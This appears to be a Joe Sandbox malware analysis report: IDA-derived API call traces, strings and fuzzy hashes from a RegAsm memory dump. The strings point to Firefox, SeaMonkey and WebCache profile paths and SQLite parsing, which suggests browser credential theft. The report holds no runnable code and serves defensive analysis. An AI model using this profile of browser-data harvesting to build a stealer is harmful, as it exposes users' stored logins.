                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                          • API String ID: 4039892925-2068335096
                                                                                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                          • API String ID: 4039892925-3369679110
                                                                                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                          • free.MSVCRT ref: 0041848B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateErrorFileLastfree
                                                                                                                          • String ID: |A
                                                                                                                          • API String ID: 981974120-1717621600
                                                                                                                          • Opcode ID: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                          • Opcode Fuzzy Hash: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                          • String ID: $0.@
                                                                                                                          • API String ID: 2758756878-1896041820
                                                                                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                          • API String ID: 1534475566-1174173950
                                                                                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 669240632-0
                                                                                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                          APIs
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                          Strings
                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                          • API String ID: 2925649097-2036018995
                                                                                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                          APIs
                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                          • String ID: "%s"
                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2911713577-0
                                                                                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp
                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                          • String ID: /nosort$/sort
                                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                          • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModuleProcessTimes
                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                          • API String ID: 116129598-3385500049
                                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                          Strings
                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                          • API String ID: 2887208581-2114579845
                                                                                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                          APIs
                                                                                                                          • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3473537107-0
                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp
                                                                                                                          • String ID: $$8
                                                                                                                          • API String ID: 1475443563-435121686
                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                          Strings
                                                                                                                          • duplicate column name: %s, xrefs: 004307FE
                                                                                                                          • too many columns on %s, xrefs: 00430763
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                          • API String ID: 0-1445880494
                                                                                                                          • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                          • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                          • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                          • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                            • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                          • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                          Memory Dump Source
